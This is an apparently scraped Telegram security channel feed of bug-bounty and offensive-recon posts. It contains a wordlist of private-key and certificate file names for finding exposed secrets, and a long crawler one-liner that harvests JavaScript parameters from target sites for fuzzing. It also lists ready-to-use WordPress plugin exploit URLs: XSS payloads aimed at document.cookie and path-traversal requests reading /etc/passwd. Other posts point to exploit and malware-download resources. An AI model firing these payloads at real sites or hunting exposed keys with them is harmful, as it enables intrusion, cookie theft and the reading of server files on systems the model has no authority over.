minikube.pem
test_key.pem
test_rsa_privkey.pem
test_rsa_privkey_encrypted.pem
rsakey.pem
key.pem
certificate.pem
private_key.pem
public_key.pem
privkey.pem
dhparams.pem
ios_push_certificate.pem
keycert.passwd.pem
ca1-key.pem
key-certbot.pem
key2048.pem
private.pem
Please open Telegram to view this post
VIEW IN TELEGRAM
๐7โค5๐5๐ฅ2
โก๏ธCommand for Hidden JS Parameter Discovery.
This command takes your recon game to the next level!โก๏ธ
cat subs.txt | (gau --threads 20 --blacklist jpg,jpeg,gif,png,tiff,ttf,otf,woff,woff2,ico,svg,pdf,txt,mp4,avi,mov,mkv,exe,zip,tar,gz,rar,7z hakrawler --depth 5 --plain --insecure waybackurls || katana -d 5 --js-crawl --auto-redirect --extensions js,json,php,aspx,asp,jsp,html,htm --proxy http://127.0.0.1:8080 ) | sort -u | httpx --silent --threads 200 --status-code --title --tech-detect --content-length --server | tee -a httpx_full.txt | grep -Eiv '\.(eot|jpg|jpeg|gif|css|tif|tiff|png|ttf|otf|woff|woff2|ico|svg|txt|pdf|mp4|avi|mov|mkv|exe|zip|tar|gz|rar|7z|css|doc|docx|xls|xlsx|ppt|pptx)$' | while read url; do vars=$(curl -sL $url | grep -Eo "(var |let |const |function |class |import |export )[a-zA-Z0-9_]+" | sed -e 's, "$url"', -e 's/\(var \|let \|const \|function \|class \|import \|export \)//g' | grep -Eiv '\.js$|\. [a-zA-Z0-9]+\.[a-zA-Z0-9]+$' | sed 's/$/= $FUZZ /'); echo -e "\e[1;33m$url\e[1;32m$vars"; done | tee -a js_parameters.txt
This command takes your recon game to the next level!โก๏ธ
โค18๐4
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - lauritzh/domscan: Simple tool to scan a website for (DOM-based) XSS vulnerabilities and Open Redirects.
Simple tool to scan a website for (DOM-based) XSS vulnerabilities and Open Redirects. - lauritzh/domscan
๐1
check this if you have these plugin.
/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&
/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd
/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
/wp-content/plugins/dzs-videogallery/admin/upload.php
/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php
/wp-content/plugins/hd-webplayer/playlist.php
/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
Please open Telegram to view this post
VIEW IN TELEGRAM
๐ฅ10๐5โค1
Please open Telegram to view this post
VIEW IN TELEGRAM
A security researcher recently found that there was a bug in iOS that could lead the iPhone to crash when certain characters were typed in a sequence. If users typed โโ::โ followed by any fourth character into Spotlight Search or App Library could either the phone to either freeze or reboot.
https://www.thehindu.com/sci-tech/technology/new-ios-bug-causes-apple-iphone-to-crash-if-a-certain-sequence-of-characters-are-typed/article68553248.ece/amp/
The Hindu
New iOS bug causes Apple iPhone to crash if a certain sequence of characters are typed
A new bug in iOS can cause the iPhone to crash if four characters are typed in a specific sequence.
What Resources You're Looking For. Do Drop A Comment! (We Don't Share Pirated Contents)
Please open Telegram to view this post
VIEW IN TELEGRAM
๐ฅ7โก1๐1
https://cyfare.net/
- ExploitDB - Exploits, Shellcodes, Dorks
- Malware Query Engine - Download, Search, Hunt & Intel
- Sandbox - Best Free Deep File Scanner with Unlimited file scans, 100+ yara rules, based on OPSWAT next-gen sandbox
- ExploitDB - Exploits, Shellcodes, Dorks
- Malware Query Engine - Download, Search, Hunt & Intel
- Sandbox - Best Free Deep File Scanner with Unlimited file scans, 100+ yara rules, based on OPSWAT next-gen sandbox
CyFare
CYFARE - Advanced Cybersecurity, Tools & Fabrication
The premier platform for malware analysis, vulnerability research, and custom fabrication. Access free scans, exploit DBs, and secure web utilities.
๐5
Brut Security pinned ยซhttps://cyfare.net/ - ExploitDB - Exploits, Shellcodes, Dorks - Malware Query Engine - Download, Search, Hunt & Intel - Sandbox - Best Free Deep File Scanner with Unlimited file scans, 100+ yara rules, based on OPSWAT next-gen sandboxยป
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - initstring/cloud_enum: Multi-cloud OSINT tool. Enumerate public resources in AWS, Azure, and Google Cloud.
Multi-cloud OSINT tool. Enumerate public resources in AWS, Azure, and Google Cloud. - initstring/cloud_enum
๐1